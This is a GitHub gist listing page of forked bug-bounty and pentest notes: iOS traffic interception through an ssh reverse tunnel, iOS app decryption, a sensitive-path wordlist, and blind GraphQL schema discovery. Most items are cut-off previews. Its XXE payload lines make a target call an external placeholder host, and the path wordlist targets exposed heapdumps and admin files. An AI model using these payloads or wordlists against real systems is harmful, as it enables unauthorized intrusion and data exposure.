@affilares
affilares / gist:3f7afd8a2124daea3dc4e9208088e5c5
Created June 30, 2022 18:29 — forked from pich4ya/gist:1ac125726e4f79c6832899e6c9b7bde1
How to capture Xamarin and Flutter HTTPS API traffic using iPhone and MBP
# @author Pichaya Morimoto ([email protected])
# How to capture Xamarin and Flutter HTTPS API traffic using iPhone and MBP
# How to MITM and intercept an iOS app's Web API via MacOS -> Burp Suite as a proxy-unaware proxy
# (e.g. Xamarin, Flutter apps that do not go through the System Proxy and do not use the default Cert Store on the iPhone)
# If it is a normal app that already uses the system proxy, this technique is not needed; just set the proxy as usual
1. Connect the (jailbroken) iPhone to the MBP via USB, then use iproxy and an ssh reverse tunnel (-R) so that local port 8080 on the iPhone is forwarded to local port 8080 on the MBP
$ brew install usbmuxd
$ iproxy 2222 22 & disown && ssh -R 8080:localhost:8080 -p 2222 [email protected] -N -f

radare2

load without any analysis (file header at offset 0x0): r2 -n /path/to/file

  • analyze all: aa
  • show sections: iS
  • list functions: afl
  • list imports: ii
  • list entrypoints: ie
  • seek to function: s sym.main
@affilares
affilares / flexdump
Created November 17, 2021 10:37 — forked from defparam/flexdump
Flexdump - A script that wraps flexdecrypt to dump, decrypt, re-sign, re-package iOS apps
#!/bin/bash
# Copyright 2021 Evan Custodio (@defparam)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
@affilares
affilares / Wordlist
Created August 28, 2021 06:52 — forked from Vishnugadupudi/Wordlist
A short wordlist I use :)
actuator
actuator/heapdump
_admin
adminer.sql
admin/heapdump
admin.php
after.sh
aliases
api
api/batch
@affilares
affilares / xxe-payloads.txt
Created August 7, 2021 14:49 — forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@affilares
affilares / api-linkfinder.sh
Created August 7, 2021 14:47 — forked from nullenc0de/api-linkfinder.sh
Exports links and params from API documentation
wget https://gist.githubusercontent.com/nullenc0de/bb16be959686295b3b1caff519cc3e05/raw/2016dc0e692821ec045edd5ae5c0aba5ec9ec3f1/api-linkfinder.yaml
echo https://stripe.com/docs/api | hakrawler -t 500 -d 10 |nuclei -t ./linkfinder.yaml -o api.txt
cat api.txt |grep url_params |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_params.txt
cat api.txt |grep relative_links |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_link_finder.txt
id: apk-recon
info:
  name: APK Recon
  author: nullenc0de
  severity: info
  tags: android,file
file:
  - extensions:
@affilares
affilares / NoFud.json
Created July 25, 2021 13:14 — forked from JesseClarkND/NoFud.json
Burp DNI config file
{
  "project_options": {
    "connections": {
      "hostname_resolution": [],
      "out_of_scope_requests": {
        "advanced_mode": false,
        "drop_all_out_of_scope": false,
        "exclude": [],
        "include": [],
        "scope_option": "suite"
@affilares
affilares / BlindGraphQL.md
Created June 29, 2021 16:21 — forked from me0wday/BlindGraphQL.md
Blind GraphQL Discovery to Altair Schema

Playing with GraphQL when introspection is disabled

Quick write-up on extracting a GraphQL schema when introspection is disabled. Bits and pieces gathered from various sources. Successfully tested on an Apollo instance.

TLDR: Some GraphQL instances provide name autocomplete suggestions. Some peeps have written tools to automate the extraction process. (ref https://youtu.be/nPB8o0cSnvM).

1. Bruteforce schema without introspection

First step is using a tool called clairvoyance by @nikitastupin (https://github.com/nikitastupin/clairvoyance). I found the main repo to lack error handling and support for additional features such as proxy.